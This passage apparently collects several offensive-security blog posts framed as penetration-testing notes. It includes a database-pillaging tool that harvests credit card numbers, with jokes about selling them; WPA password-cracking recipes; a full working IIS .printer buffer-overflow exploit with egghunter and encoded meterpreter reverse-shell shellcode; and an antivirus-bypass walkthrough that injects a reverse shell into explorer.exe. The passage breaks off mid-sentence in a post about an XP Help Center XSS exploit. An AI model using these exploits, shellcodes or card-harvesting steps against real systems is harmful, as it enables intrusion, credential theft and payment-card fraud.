root@bt:~/pillage# python dbPillage.py -a 192.168.1.12/XE -d oracle -u HR -p HR

Select a database user to pillage:

1: SYS

2: SYSTEM

3: OUTLN

4: DIP

5: TSMSYS

6: MDSYS

7: DBSNMP

8: FLOWS_020100

9: FLOWS_FILES

10: ANONYMOUS

11: CTXSYS

12: XDB

13: XDEV

14: HR

15: TEST

16: XDBA

Choose the database you want by typing the number next to your DB choice

Or rip through every database by typing "cowboy" to rape everything: cowboy

Parsing the the tables out of SYS database

Searching for CC cards in----Database:SYS| Table:DUAL

Searching for CC cards in----Database:SYS| Table:AUDIT_ACTIONS

Your current user doesnt have access to this table

Searching for CC cards in----Database:FLOWS_020100| Table:WWV_FLOW_LISTS_OF_VALUES$

Found: Mastercard:DeletedOutput

Found: Discover: DeletedOutput

Searching for CC cards in----Database:FLOWS_020100| Table:WWV_FLOW_LIST_OF_VALUES_DATA

Found: Mastercard:DeletedOutput

Found: Visa:DeletedOutput

Found: Discover:DeletedOutput

Validating credit cards via mod-10 checksum method....

Here are all the validated credit cards found, buy me something pretty YAY

['DeletedOutput ']

These are all the possible card values found, maybe you can still sell them LOL

['DeletedOutput ']

Review the following Database:Tables pairs for sensitive data

[['FLOWS_020100', 'WWV_FLOW_LISTS_OF_VALUES$'], ['FLOWS_020100', 'WWV_FLOW_LIST_OF_VALUES_DATA']]

Example Summary:

A bunch of output will be displayed I cut most of it out for clarity because its not necessary in this example, but you get the idea, lots of output and info and then a small little summary at the end… The end summary contains the validated cards, all the cards, and what tables and databases have sensitive data. This was all done with the single command “cowboy” to search every single db that user had access to. I will be adding reporting to future releases of this tool.

Example 2: Data browsing with Result Limits of 2 records

root@bt:~/pillage# python dbPillage.py -a 192.168.1.12/XE -d oracle -u HR -p HR --limit 2

Select a database user to pillage:

1: SYS

2: SYSTEM

3: OUTLN

4: DIP

5: TSMSYS

6: MDSYS

7: DBSNMP

8: FLOWS_020100

9: FLOWS_FILES

10: ANONYMOUS

11: CTXSYS

12: XDB

13: XDEV

14: HR

15: TEST

16: XDBA

Choose the database you want by typing the number next to your DB choice

Or rip through every database by typing "cowboy" to rape everything: 14

Select a table to rape and pillage:

1: REGIONS

2: COUNTRIES

3: LOCATIONS

4: DEPARTMENTS

5: JOBS

6: EMPLOYEES

7: JOB_HISTORY

Choose the number next to the table you want to search

Or you can type "all" to search every table in your chosen database: 6

You chose EMPLOYEES for pillaging

Would you like to display the data in the table or search for sensitive data??

"search" or "display" table contents:display

Searching for CC cards in----Database:HR| Table:EMPLOYEES

100

Steven

King

SKING

515.123.4567

1987-06-17 00:00:00

AD_PRES

24000.0

None

101

Neena

Kochhar

NKOCHHAR

515.123.4568

1989-09-21 00:00:00

AD_VP

17000.0

None

100

Example Summary:

In this example I browsed around the database till I found a table I with some data I wanted to view. Because I set the Rate Limit to two records I pulled back 2 full employee records and posted all of the data to the screen. This kicks serious ass if you have had the unfortunate experience of using sqlserver management console or other horrible GUI’s in windows to view or search for data. Oh and I just noticed that the display is saying its searching when its actually displaying LOL… need to change that.

Example 3: MYSQL Run at the Table Level rather then DB.

Note: just used the default BT mysql database and added in random data

root@bt:~/pillage# python dbPillage.py -a 127.0.0.1 -d mysql -u root -p toor

Select a database to pillage:

1: information_schema

2: PCItest

3: msf3

4: mysql

Choose the database you want by typing the number next to your DB choice

Or rip through every database by typing "cowboy" to rape everything: 3

msf3

Select a table to rape pillage:

1: attachments

2: attachments_email_templates

3: campaigns

4: clients

5: creds

6: email_addresses

7: email_templates

8: events

9: exploited_hosts

10: hosts

11: imported_creds

12: loots

13: notes

14: project_members

15: refs

16: report_templates

17: reports

18: schema_migrations

19: services

20: tasks

21: users

22: vulns

23: vulns_refs

24: web_forms

25: web_pages

26: web_sites

27: web_templates

28: web_vulns

29: wmap_requests

30: wmap_targets

31: workspaces

Choose the number next to the table you want to search

Or you can type "all" to search every table in your chosen database: all

Searching for CC cards in----Database:msf3| Table:wmap_targets

Searching for CC cards in----Database:msf3| Table:workspaces

etc

……………

Validating credit cards via mod-10 checksum method....

Here are all the validated credit cards found, buy me something pretty

['DeletedOutput ']

These are all the found regex card matches..

['DeletedOutput ']

Review the following Database:Table pairs for sensitive data

[['msf3', 'email_addresses'], ['msf3', 'email_templates']]

Example Summary:

In this example I chose a database and then decided I wanted to search every table in that database for credit cards. So after selecting the database I just typed “all” and let it rip. This is useful if you see databases with names that strike your interest. Soon I will add in other requested features that search for certain fields such as passwords and specified interesting names and rips data out of them.

If you have any comments or suggestions please let me know, I have been working on this on and off to save myself time with pillaging on penetration tests.

OpenDLP Pass-The-Hash

2011-02-04T14:47:00.000-08:00

OpenDLP is a great time saving tool when looking for sensitive data on windows machines but one pain with using it is that it requires a username and password for the target machine. Passwords are not always a luxury provided when conducting a pentest, but password hashes are usually plentiful in a windows environment and time crack passwords is not always feasible. The details of obtaining windows password hashes is out of scope for this guide and it will be assumed the reader is familiar with "passing the hash". This guide also assumes that you have already patched your systems samba install to allow for "passing the hash" and have also patched "winexe" - further information about this can be found at the following page:
http://www.foofus.net/~jmk/passhash.html

With that out of the way.....

The OpenDLP database will need to be modified in order to hold our hash. If you already have OpenDLP installed or you are creating a new install you will need to run the following command after the database has been setup -

alter table profiles add column hash varchar(65);

Patching OpenDLP -

The provided patch is targeted for OpenDLP 0.2.5 - I cannot promise that it will work against any other version -

OpenDLP - http://code.google.com/p/opendlp/downloads/detail?name=OpenDLP-0.2.5.tar.bz2&can=2&q=

PTH-Patch - pth_mod.patch

If you are patching a new install move "pth_mod.patch" into the OpenDLP directory (OpenDLP-0.2.5) and apply -

tar -xjf OpenDLP-0.2.5.tar.bz2
mv pth_mod.patch OpenDLP-0.2.5
cd OpenDLP-0.2.5
patch -p1 -i pth_mod.patch
patching file OpenDLP/web/bin/control.html
patching file OpenDLP/web/bin/download_file.html
patching file OpenDLP/web/bin/profiles.html
patching file OpenDLP/web/bin/profiles-new.html
patching file OpenDLP/web/bin/results/results.html
patching file OpenDLP/web/bin/start-verify.html

If you are patching an existing install (OpenDLP-0.2.5) move the "pth_mod.patch" into the directory where OpenDLP is installed (default is - /var/www/localhost/OpenDLP/ ) and apply -

mv pth_mod.patch /var/www/localhost/OpenDLP/
patch -p2 -i pth_mod.patch
patching file web/bin/control.html
patching file web/bin/download_file.html
patching file web/bin/profiles.html
patching file web/bin/profiles-new.html
patching file web/bin/results/results.html
patching file web/bin/start-verify.html

Confirm that your OpenDLP install is still working by accessing the application.

Create a new profile, as you can see "SMBHash" is now an available option -

Enter in your information, as you can see in my example I have entered in a hash but no password -

Just to show here is the database entry for this profile -

Create a new scan using our new profile -

View the scan results, in the following screen shot I have clicked on the flagged file and opened it in gedit -

WPA JTR/Pyrit/cowpatty uses and cracking interoperability

2011-01-18T07:47:00.000-08:00

Below is a bunch of ways to inter-operate between pyrit/cowpatty/jtr with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came up across a rather standard WPA PSK network. However, this came with issues that spawned into learning a bunch of new command line usages for various tools in conjunction with one another.

For the end goal of a simple WPA key retrieval. The issue I was having which required me to expand my wireless toolset was that programs across various operating systems were behaving differently or just plain not working at all. For example my cracker of choice is generally CowPatty but for some reason and I hope one of the readers on this blog can tell me why, CowPatty was behaving differently between my OSX, Standard Linux distro and my BT4 R2 Vmware. This is also the reason for the last post on GPU CUDA via OSX. So below are various ways to use different programs for WPA cracking related gymnastics of sorts.

Standard Cracking:

Firstly we have our standard way of cracking WPA, we can use CowPatty to determine if we have a handshake and then crack the password.

Check if we have a handshake with –c option:

cowpatty -r Capture.cap -c -s SSID

cowpatty 4.6 - WPA-PSK dictionary attack.

Collected all necessary data to mount crack against WPA/PSK passphrase

Try to Crack the password:

Now if we are sure we have a valid handshake we can crack the hash with a dictionary file. Using the following cmdline.

cowpatty -r Capture.cap -f dictionary.txt -s SSID

Starting dictionary attack. Please be patient.

key no. 1000: Anglo-spanish

Unable to identify the PSK from the dictionary file. Try expanding your

passphrase list, and double-check the SSID. Sorry it didn't work out.

1786 passphrases tested in 8.04 seconds: 222.04 passphrases/second

My problem was that CowPatty in anything other then my BT4 r2 vmware was not properly finding the handshake.

cowpatty -r Capture.cap -c -s SSID

End of pcap capture file, incomplete four-way handshake exchange. Try using a

different capture.

Hmm CowPatty is misbehaving on my regular machine, which is where I would want to pre-compute hashes and perform my cracking due to more memory and cores available on my primary system. I do not want to crack any passwords inside of a vmware unless its precomputed and I certainly do not want to try to compute hashes on a vmare either. So I decided to check another popular WPA cracking tool Pyrit against the password hash file.

Using Pyrit for cracking instead:

pyrit -r Capture.cap -i dictionary.txt attack_passthrough

This command was also failing on every single system for unknown reasons at the time. So I decided I was going to have to use Pyrit to Precompute hashes and then use those precomputed hashes inside of a vmware on cowpatty. Interestingly enough you can export pyrit hashtables in various formats to be used with airolib and cowpatty.

Pyrit Usage for Hashtables and cracking:

Pyrit is extremely useful for a few reasons, most importantly being that you can resume functionality such as creating hashtables if for some reason you have to stop an operation and unplug or shutdown your machine. You can simply quit pyrit like any other program, but pyrit will remember where it left off in its hashtable computing. No need to leave your machine in one place running for hours or days. Simply quit and resume at will.

Create a database of SSID’s for attack:

Pyrit –e essid create_essid

Add dictionary words to be hashed:

Pyrit –i dictionaryFile import_passwords

These 2 commands will create a dictionary of SSID and password values used in a standard attack or for precompution of hashtables. Another nice feature of pyrit is that you can keep running the dictionary command to add in as many dictionary files as you have available. Pyrit will remove duplicate entries and will also remove passwords that cannot be used in a WPA protected network such as passwords below 8 characters. This is fantastic, as you won’t waste processor cycles on passwords that are useless.

Create hashtables:

Pyrit batch

The previous command will create hashtables of everything in the database for the given SSID values in the database. At any point during this operation you can quit and resume simply by killing the operation and typing in the previous command again, pyrit will pick up where it left off. Once this is completed you can directly use Pyrit to attack a handshake or in my case pyrit was not recognizing the capture file so I had to export the database in cowpatty format with the following command.

Using pyrit to crack:

Pyrit –r capture.cap attack_db

Exporting different hashtable formats:

As I stated pyrit cracking didn’t work for me due to complications on the way pyrit parsed the capture file, the pyrit command would fail every time and not recognize the handshake. So I exported the hashtable database for use with cowpatty.

Cowpatty export:

Pyrit –e essid -o hashes.cow export_cowpatty

Note that you can also export to airolib format if you prefer using the aircrack suite of tools to do your pre-computed cracking just switch out the export_cowpatty command for the airolib command. Until I got pyrit working correctly I preferred to use cowpatty so I exported to my preferred format.

CowPatty File Size Issue:

Apparently when using 32 bit systems and hash file sizes over 2 gigs cowpatty will not work. So when I tried to directly attack the WPA PSK with the hashfile I was given an error “Could not stat hashfile. Check file path”.

cowpatty -r Capture.cap -d hashes.cow –s SSID

cowpatty 4.6 - WPA-PSK dictionary attack.

cowpatty: Could not stat hashfile. Check file path.

File Size WorkAround:

One way around this annoying issue was to pipe your hashfile into the STDIN value of CowPatty by outputting the hashfile with the unix “cat” command. You can do this by specifying the dash character as the input dictionary file in CowPatty. I found this to be very useful for a few reasons I will show next.

CowPatty with STDIN:

Cat hashes.cow | cowpatty –d - -r capture.cap -s SSID

Using the previous command you can bypass the filesize restriction and use precomputed hashfiles of larger sizes J But the STDIN can also be used for other cracking methods such as running custom bruteforcing of password files with JTR. By taking a dictionary and running it through the rules option of JTR additional characters such as numbers will be added to each word in your dictionary file. Although this may not be feasible do to the slow nature of password cracking without precomputed hashes, it is an option if dictionary files are not finding the password for you.

JTR STDOUT with CowPatty STDIN:

In the john directory type:

./john --wordlist=wordlist --stdout –rules |cowpatty –f - -r capture.cap -s SSID

Custom password list creation:

Another option would be to create a custom password list out of your current password list using JTR rules and then batch them with pyrit shown earlier in this blog post. You can create a custom password list by just using STDOUT to a new password file.

In the john directory type:

./john --wordlist=dictionary.txt --stdout --rules > newpasslist.txt

Then add these new passwords to your pyrit dictionary and re-batch the new passwords with the same commands show previously. This may help in situations where users choose passwords such as password4. Which isn’t a dictionary word but is certainly an easy password to guess.

Custom passwords via webpages:

You could also create yourself custom passwords lists via scraping the companies website or the system administrators personal webpage’s. Its not to hard to find out who the administrator is, make a few phone calls or check the companies webpage for listings of employees. Once a page is found you can scrape the page for password with a tool by the name of CEWL. Although I don’t condone the use of Ruby you may catch a weird disease or feel really dirty after using it yuuuk ruby, this is a useful tool for creating a custom password list.

./cewl.rb -d 1 -w passwordList.txt website.com

Cewl will create a custom password list named “passwordList.txt” which you can then run through john to add more passwords with numbers before batching the new passwords with pyrit. Pyrit will get rid of the useless passwords for you during password import.

The pyrit cracking issue:

I belive the cracking and parsing issue in pyrit was due to the version of pyrit that I was using. For me the only version of pyrit that functions correctly is the SVN version of pyrit currently available on the pyrit site. Any other version failed to work correctly for both parsing and for GPU cracking... See the previous post on this blog for getting your OSX machine to work with GPU and Pyrit. What this will do for you is allow you to efficiently crack passwords in pyrit with much quicker speeds even when passwords are not precomputed.

I hope some of these techniques are useful in your penetration testing whether its standard pentesting and password cracking or in my case WPA cracking.. These are mostly notes for myself in the future when I forget what the heck I did with filesizes and other issues random issues....

Setting up Pyrit on OSX with CUDA Support

2011-01-05T14:29:00.000-08:00

A quick guide on getting pyrit installed and working on OSX with gpu (CUDA) support.

First you need to download and install CUDA drivers and CUDA SDK from nvidia.
Drivers -
http://www.nvidia.com/object/macosx-cuda-3.2.17-driver.html

CUDA SDK -
http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/3_2_prod/toolkit/cudatoolkit_3.2.17_macos.pkg

Next you need to install Scapy
Scapy requires a couple libraries to be installed first - pylibpcap and libdnet.

Download and install libdnet and its python bindings
http://libdnet.googlecode.com/files/libdnet-1.12.tgz

tar -xzf libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install

Download and install pylibpcap
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.2.tar.gz

tar -xzf pylibpcap-0.6.2.tar.gz
cd pylibpcap-0.6.2
sudo python setup.py install

Download and install scapy
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz

tar -xzf scapy-latest.tar.gz
cd scapy-latest
sudo python setup.py install

Now that all the pre-reqs are installed we can now build and install Pyrit.

Download the latest pyrit from svn -

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only

Build and install pyrit -

cd pyrit-read-only
cd pyrit
sudo python setup.py install

Build and install pyrit-cuda -

cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install

Now that Pyrit is installed verify that cuda support is working -

pyrit list_cores
Pyrit 0.4.0-dev (svn r288) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1: 'CUDA-Device #1 'GeForce GT 330M''
#2: 'CPU-Core (SSE2)'
#3: 'CPU-Core (SSE2)'
#4: 'CPU-Core (SSE2)'
#5: 'Network-Clients'

Blast From The Past

2010-11-24T07:39:00.000-08:00

Recently on a test I ran into a windows 2000 server running iis5 with the Internet Printing module enabled, I was quite surprised by this but...a shell is a shell right? Since this was on the job and I wasn't wearing my cowboy hat I fired up my windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flakey. On the first run of the exploit module it did not work so I took a look at my configuration of IIS again to make sure that everything was setup properly. After confirming IIS settings I tried the module a couple more times and finally was able to get a shell. I restarted IIS and tried the module a few more times...it was still hit or miss - sometimes it would work on the first try sometimes it would take three tries, something was strange....

After breaking out immunity debugger it became clear as to why the exploit did not work everytime. According to the metasploit module the shellcode was being held at an offset of EBX and with a short assembly stub we jump to that location (see metasploit snippet below)

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know about where in memory our payload will be when we gain control of EIP seems like a good place to use an egghunter :) I started out with an existing egghunter (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little since I know about where in memory my payload is there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -

mov edx, ebx #ebx is the area of our starting point
or dx, 0fff
xor dx,0fff #clear out the bottom half of edx for the start of our loop
inc edx #increment edx - this is the start of our loop
nop #abbreviated nops where the original access violation check was
...
...
mov eax, 57303054 #load our egg "W00T"
mov edi, edx #set edi to point at our current location in memory
scas dword ptr es:[edi] #compare our egg to dword at edi
jnz #jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the egg
jnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi #jump to edi as it points to the first byte after our egg

After implementing the egghunter into the exploit I had no issues getting a shell everytime :)

Full exploit below - obviously will have to change the shellcode for it to work for you -

import urllib2

import sys

shell= "T00WT00W"

shell +="\x90"*(10)

########################################################################################################

# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #

########################################################################################################

shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"

"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"

"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"

"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"

"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"

"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"

"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"

"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"

"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"

"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"

"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"

"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"

"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"

"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"

"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"

"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"

"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"

"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"

"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"

"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"

"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"

"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"

"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"

"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"

"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"

"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"

"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"

"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"

"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"

"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"

"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"

"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"

"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"

"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"

"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"

"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"

"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"

"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"

"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"

"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"

"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"

"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"

"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"

"\x33\x44\x4a\x41\x41")

egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156

useragent = 'Shit Bird'

header = {'User-Agent':useragent, 'Host':buff}

req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)

res = urllib2.urlopen(req)

res.close()

Open LockSport Donations

2010-08-20T22:28:00.000-07:00

A slight divergence from the technical for a moment, everyone should go check out a cool new line of custom lock-picking tools that will be coming out shortly. Pre-Order yours by providing a donation to get the business started. I proudly donated a very large sum to this cause today and setup onsite training as well for a group of my friends with the creator of these lock-picks....

Check it out!!!

http://www.kickstarter.com/projects/schuyler/lockpicks-by-open-locksport/

Generally I like to stay 100% technical posts but this guy was really cool, extremely excited about what he does and thats what I like to see!!! Motivated people with passion about their interests... I am always about supporting individuals like this... So check them out and get yourself a nice set of custom lock-pick tools...

And if youre in the cleveland area and interested in lockpicking, send me a message and i will let you know about lockpicking meet ups.

Bypassing AntiVirus With Process Injection

2010-08-17T18:39:00.001-07:00

There is a new tool for anti virus bypass which allows an attacker to inject shellcode into a process Post exploitation. Enabling the attacker to pass a shell to a remote location, generally i assume this would be a meterpreter shell for obvious reasons. Those of us who penetration test for a living are aware of the need to sometimes have a shell after obtaining gui system access. Buuuut Antivirus can be a real pain in the ass sometimes.

A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly, below is a description of why it was not working for them and how to fix it.. here is a link for the program as reference.

https://sites.google.com/site/mamit30/home/injector

Videos are cool and all but as we know they tend to leave things out, in this case they left out the proper way to create shellcode. They also left out how to create the file to inject into the process, so below is a walkthrough without missing any details of how to get a shell by injecting into a process with injector... Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather then having a distracting song..

Mainly I believe the issues people were having are of bad character sets within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption)

When you inject a payload into a process if any characters are bad such as a Null characters the process will automatically terminate or create undesired results, it doesn't always have to be null and all processes and programs are created differently depending what they are looking for.Encoding is a good way to solve these issues. So lets get to it!!

Original Video: http://vimeo.com/14139105

Issues people had:

-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)

Resolution:

-Alpha upper encoding
-using the py file to create raw code

So basically the problem people were having is that there are bad characters in their shellcode that were crashing the process, following is a step by step on how to use the antivirus bypass technique that the video does not show clearly and in its entirety....

1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)

root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

[*] x86/alpha_upper succeeded with size 699 (iteration=1)
buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +
..........
.................

The output from this will be very large but no worries size doesn't appear to be an issue....

2. Put this shell-code into the generic.py file like so (Remove all + signs and surround the output with parenthesis)

buffer=("\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"

"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"

"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"

"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"

"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"

............

................. )

file=open("pgeneric.txt","w")
file.write(buffer)

3. Startup your multi-handler and after you receive the payload you will get a shell... (go to step 4 below to send off your payload.)

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.3:2438) at Tue Aug 17 20:30:20 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator> YAY FOR SHELL

4. Check your process list for Explorer.exe then ship off your payload into the process, this payload is now encoded to remove all bad characters and with your multi/handler running you should receive a shell no problem.

C:\Documents and Settings\Administrator\Desktop\injector>tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 244 K
smss.exe 620 Console 0 388 K
csrss.exe 668 Console 0 1,660 K
winlogon.exe 692 Console 0 5,152 K
services.exe 736 Console 0 4,312 K
lsass.exe 748 Console 0 1,544 K
vmacthlp.exe 904 Console 0 2,292 K
svchost.exe 920 Console 0 4,548 K
svchost.exe 1000 Console 0 4,012 K
svchost.exe 1092 Console 0 21,824 K
svchost.exe 1136 Console 0 3,060 K
svchost.exe 1212 Console 0 4,584 K
spoolsv.exe 1416 Console 0 5,476 K
sqlservr.exe 1800 Console 0 8,684 K
sqlwriter.exe 1948 Console 0 3,268 K
notepad++.exe 2104 Console                 0      3,072 K
notepad.exe 3612 Console                 0      3,388 K
explorer.exe 1568 Console                 0     22,064 K
tasklist.exe 1900 Console                 0      4,244 K
wmiprvse.exe 2708 Console                 0      5,404 K

C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com

C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter

I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest, this is an excellent technique and very neat but explanation of proper payloads and examples were lacking, I would have much preferred a written write up with more detail for reference so that is what i am providing..

Final Note:

Also one final note, you will notice i used the "explorer.exe" process, the reason I used explorer.exe because if I blow it up, it will respawn itself. Also a good technique when migrating processes in Meterpreter, if explorer.exe Fubars, you can just kill the process and it will respawn. I have used this technique on processes running as a domain administrator to get full domain access. However when I blew up the process I lost access but was able to just respawn it and regain my foothold when no hashes or tokens were available.

.
.

Windows XP Help Center Client Side Attack

2010-06-11T14:56:00.000-07:00

I Just saw this exploit in full disclosure and ExploitDB:

http://seclists.org/fulldisclosure/2010/Jun/205
http://www.exploit-db.com/exploits/13808/

Then I checked in metasploit and the exploit is already available.

If you are on an internal or client side test penetration test I generally see most clients running windows XP and generally outdated browsers. They are either using IE6 or IE7 or IE8.... The essence of this attack is that an un-handled XSS is utilized in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be directly accessed via a url in a browser. By using a defer in a XSS to execute a script in a privileged zone a windows popup is bypassed.

<script defer>code</script>

"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "

This exploit works on xp sp2 and sp3 which covers most clients in most companies. I do not see many companies running vista or windows7.... IE 6 and IE7 browsers are vulnerable to this attack however IE8 works but with a user popup box unless the victim is running certain versions of media player... I also just tested this with a IE8 browser running in comparability mode... When the client visited the page Automatically the exploit pulled up the help docs and gave me a meterpreter shell wooooot

I am thinking this would be a good exploit to use in client side penetration tests... So below is the info and a quick usage of the exploit...

Module Name:
ms10_xxx_helpctr_xss_cmd_exec

Below is a description and then usage of the module... give it a try...

Description: (From Metasploit)
"Help and Support Center is the default application provided to
